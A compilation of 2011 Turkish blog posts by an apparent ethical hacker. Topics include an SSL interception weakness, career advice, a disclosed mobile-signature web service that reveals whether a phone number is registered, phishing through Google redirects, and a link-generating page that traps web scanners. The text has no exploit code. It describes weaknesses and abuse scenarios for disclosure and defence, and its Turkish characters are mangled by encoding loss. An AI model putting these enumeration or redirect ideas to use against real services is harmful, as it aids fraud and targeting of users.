Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

